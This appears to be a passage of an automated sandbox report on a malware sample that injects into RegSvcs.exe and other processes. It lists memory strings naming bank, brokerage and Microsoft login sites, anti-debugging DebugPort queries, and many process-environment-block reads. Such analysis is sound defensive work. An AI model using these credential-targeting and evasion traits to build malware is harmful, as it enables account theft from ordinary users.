                    Source: H846yjBj.17.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: H846yjBj.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: systray.exe, 00000011.00000002.4498880450.00000000006C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4499410305.0000000000CAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
                    Source: H846yjBj.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: H846yjBj.17.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: H846yjBj.17.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: H846yjBj.17.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: H846yjBj.17.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: H846yjBj.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: H846yjBj.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: firefox.exe, 00000014.00000002.2633826888.0000020F30C9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUU
                    Source: H846yjBj.17.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: H846yjBj.17.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: H846yjBj.17.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: H846yjBj.17.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: H846yjBj.17.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: H846yjBj.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: H846yjBj.17.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: H846yjBj.17.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: H846yjBj.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: H846yjBj.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\Documents.exe Process information queried: ProcessInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
                    Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0152096E rdtsc 9_2_0152096E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00417853 LdrLoadDll,9_2_00417853
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01578158 mov eax, dword ptr fs:[00000030h]9_2_01578158
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01574144 mov eax, dword ptr fs:[00000030h]9_2_01574144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01574144 mov ecx, dword ptr fs:[00000030h]9_2_01574144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E6154 mov eax, dword ptr fs:[00000030h]9_2_014E6154
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DC156 mov eax, dword ptr fs:[00000030h]9_2_014DC156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158A118 mov ecx, dword ptr fs:[00000030h]9_2_0158A118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158A118 mov eax, dword ptr fs:[00000030h]9_2_0158A118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A0115 mov eax, dword ptr fs:[00000030h]9_2_015A0115
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E10E mov eax, dword ptr fs:[00000030h]9_2_0158E10E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E10E mov ecx, dword ptr fs:[00000030h]9_2_0158E10E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01510124 mov eax, dword ptr fs:[00000030h]9_2_01510124
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155E1D0 mov eax, dword ptr fs:[00000030h]9_2_0155E1D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155E1D0 mov ecx, dword ptr fs:[00000030h]9_2_0155E1D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A61C3 mov eax, dword ptr fs:[00000030h]9_2_015A61C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015101F8 mov eax, dword ptr fs:[00000030h]9_2_015101F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B61E5 mov eax, dword ptr fs:[00000030h]9_2_015B61E5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156019F mov eax, dword ptr fs:[00000030h]9_2_0156019F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159C188 mov eax, dword ptr fs:[00000030h]9_2_0159C188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01520185 mov eax, dword ptr fs:[00000030h]9_2_01520185
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01584180 mov eax, dword ptr fs:[00000030h]9_2_01584180
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DA197 mov eax, dword ptr fs:[00000030h]9_2_014DA197
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566050 mov eax, dword ptr fs:[00000030h]9_2_01566050
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E2050 mov eax, dword ptr fs:[00000030h]9_2_014E2050
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150C073 mov eax, dword ptr fs:[00000030h]9_2_0150C073
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01564000 mov ecx, dword ptr fs:[00000030h]9_2_01564000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01582000 mov eax, dword ptr fs:[00000030h]9_2_01582000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FE016 mov eax, dword ptr fs:[00000030h]9_2_014FE016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01576030 mov eax, dword ptr fs:[00000030h]9_2_01576030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DA020 mov eax, dword ptr fs:[00000030h]9_2_014DA020
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DC020 mov eax, dword ptr fs:[00000030h]9_2_014DC020
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015620DE mov eax, dword ptr fs:[00000030h]9_2_015620DE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015220F0 mov ecx, dword ptr fs:[00000030h]9_2_015220F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E80E9 mov eax, dword ptr fs:[00000030h]9_2_014E80E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DA0E3 mov ecx, dword ptr fs:[00000030h]9_2_014DA0E3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015660E0 mov eax, dword ptr fs:[00000030h]9_2_015660E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DC0F0 mov eax, dword ptr fs:[00000030h]9_2_014DC0F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E208A mov eax, dword ptr fs:[00000030h]9_2_014E208A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A60B8 mov eax, dword ptr fs:[00000030h]9_2_015A60B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A60B8 mov ecx, dword ptr fs:[00000030h]9_2_015A60B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015780A8 mov eax, dword ptr fs:[00000030h]9_2_015780A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AA352 mov eax, dword ptr fs:[00000030h]9_2_015AA352
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01588350 mov ecx, dword ptr fs:[00000030h]9_2_01588350
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156035C mov eax, dword ptr fs:[00000030h]9_2_0156035C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156035C mov ecx, dword ptr fs:[00000030h]9_2_0156035C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01562349 mov eax, dword ptr fs:[00000030h]9_2_01562349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158437C mov eax, dword ptr fs:[00000030h]9_2_0158437C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01500310 mov ecx, dword ptr fs:[00000030h]9_2_01500310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A30B mov eax, dword ptr fs:[00000030h]9_2_0151A30B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DC310 mov ecx, dword ptr fs:[00000030h]9_2_014DC310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E3DB mov eax, dword ptr fs:[00000030h]9_2_0158E3DB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158E3DB mov ecx, dword ptr fs:[00000030h]9_2_0158E3DB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015843D4 mov eax, dword ptr fs:[00000030h]9_2_015843D4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA3C0 mov eax, dword ptr fs:[00000030h]9_2_014EA3C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E83C0 mov eax, dword ptr fs:[00000030h]9_2_014E83C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E83C0 mov eax, dword ptr fs:[00000030h]9_2_014E83C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E83C0 mov eax, dword ptr fs:[00000030h]9_2_014E83C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E83C0 mov eax, dword ptr fs:[00000030h]9_2_014E83C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159C3CD mov eax, dword ptr fs:[00000030h]9_2_0159C3CD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015663C0 mov eax, dword ptr fs:[00000030h]9_2_015663C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F03E9 mov eax, dword ptr fs:[00000030h]9_2_014F03E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015163FF mov eax, dword ptr fs:[00000030h]9_2_015163FF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FE3F0 mov eax, dword ptr fs:[00000030h]9_2_014FE3F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FE3F0 mov eax, dword ptr fs:[00000030h]9_2_014FE3F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FE3F0 mov eax, dword ptr fs:[00000030h]9_2_014FE3F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DE388 mov eax, dword ptr fs:[00000030h]9_2_014DE388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DE388 mov eax, dword ptr fs:[00000030h]9_2_014DE388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DE388 mov eax, dword ptr fs:[00000030h]9_2_014DE388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D8397 mov eax, dword ptr fs:[00000030h]9_2_014D8397
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D8397 mov eax, dword ptr fs:[00000030h]9_2_014D8397
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D8397 mov eax, dword ptr fs:[00000030h]9_2_014D8397
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150438F mov eax, dword ptr fs:[00000030h]9_2_0150438F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150438F mov eax, dword ptr fs:[00000030h]9_2_0150438F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159A250 mov eax, dword ptr fs:[00000030h]9_2_0159A250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159A250 mov eax, dword ptr fs:[00000030h]9_2_0159A250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01568243 mov eax, dword ptr fs:[00000030h]9_2_01568243
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01568243 mov ecx, dword ptr fs:[00000030h]9_2_01568243
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E6259 mov eax, dword ptr fs:[00000030h]9_2_014E6259
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DA250 mov eax, dword ptr fs:[00000030h]9_2_014DA250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D826B mov eax, dword ptr fs:[00000030h]9_2_014D826B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590274 mov eax, dword ptr fs:[00000030h]9_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E4260 mov eax, dword ptr fs:[00000030h]9_2_014E4260
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E4260 mov eax, dword ptr fs:[00000030h]9_2_014E4260
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E4260 mov eax, dword ptr fs:[00000030h]9_2_014E4260
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D823B mov eax, dword ptr fs:[00000030h]9_2_014D823B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA2C3 mov eax, dword ptr fs:[00000030h]9_2_014EA2C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA2C3 mov eax, dword ptr fs:[00000030h]9_2_014EA2C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA2C3 mov eax, dword ptr fs:[00000030h]9_2_014EA2C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA2C3 mov eax, dword ptr fs:[00000030h]9_2_014EA2C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA2C3 mov eax, dword ptr fs:[00000030h]9_2_014EA2C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F02E1 mov eax, dword ptr fs:[00000030h]9_2_014F02E1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F02E1 mov eax, dword ptr fs:[00000030h]9_2_014F02E1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F02E1 mov eax, dword ptr fs:[00000030h]9_2_014F02E1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01560283 mov eax, dword ptr fs:[00000030h]9_2_01560283
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01560283 mov eax, dword ptr fs:[00000030h]9_2_01560283
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01560283 mov eax, dword ptr fs:[00000030h]9_2_01560283
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E284 mov eax, dword ptr fs:[00000030h]9_2_0151E284
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E284 mov eax, dword ptr fs:[00000030h]9_2_0151E284
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F02A0 mov eax, dword ptr fs:[00000030h]9_2_014F02A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F02A0 mov eax, dword ptr fs:[00000030h]9_2_014F02A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015762A0 mov eax, dword ptr fs:[00000030h]9_2_015762A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015762A0 mov ecx, dword ptr fs:[00000030h]9_2_015762A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015762A0 mov eax, dword ptr fs:[00000030h]9_2_015762A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015762A0 mov eax, dword ptr fs:[00000030h]9_2_015762A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015762A0 mov eax, dword ptr fs:[00000030h]9_2_015762A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015762A0 mov eax, dword ptr fs:[00000030h]9_2_015762A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8550 mov eax, dword ptr fs:[00000030h]9_2_014E8550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8550 mov eax, dword ptr fs:[00000030h]9_2_014E8550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151656A mov eax, dword ptr fs:[00000030h]9_2_0151656A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151656A mov eax, dword ptr fs:[00000030h]9_2_0151656A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151656A mov eax, dword ptr fs:[00000030h]9_2_0151656A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01576500 mov eax, dword ptr fs:[00000030h]9_2_01576500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4500 mov eax, dword ptr fs:[00000030h]9_2_015B4500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4500 mov eax, dword ptr fs:[00000030h]9_2_015B4500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4500 mov eax, dword ptr fs:[00000030h]9_2_015B4500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4500 mov eax, dword ptr fs:[00000030h]9_2_015B4500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4500 mov eax, dword ptr fs:[00000030h]9_2_015B4500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4500 mov eax, dword ptr fs:[00000030h]9_2_015B4500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4500 mov eax, dword ptr fs:[00000030h]9_2_015B4500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E53E mov eax, dword ptr fs:[00000030h]9_2_0150E53E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E53E mov eax, dword ptr fs:[00000030h]9_2_0150E53E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E53E mov eax, dword ptr fs:[00000030h]9_2_0150E53E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E53E mov eax, dword ptr fs:[00000030h]9_2_0150E53E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E53E mov eax, dword ptr fs:[00000030h]9_2_0150E53E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0535 mov eax, dword ptr fs:[00000030h]9_2_014F0535
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0535 mov eax, dword ptr fs:[00000030h]9_2_014F0535
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0535 mov eax, dword ptr fs:[00000030h]9_2_014F0535
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0535 mov eax, dword ptr fs:[00000030h]9_2_014F0535
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0535 mov eax, dword ptr fs:[00000030h]9_2_014F0535
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0535 mov eax, dword ptr fs:[00000030h]9_2_014F0535
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A5D0 mov eax, dword ptr fs:[00000030h]9_2_0151A5D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A5D0 mov eax, dword ptr fs:[00000030h]9_2_0151A5D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E5CF mov eax, dword ptr fs:[00000030h]9_2_0151E5CF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E5CF mov eax, dword ptr fs:[00000030h]9_2_0151E5CF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E65D0 mov eax, dword ptr fs:[00000030h]9_2_014E65D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E25E0 mov eax, dword ptr fs:[00000030h]9_2_014E25E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
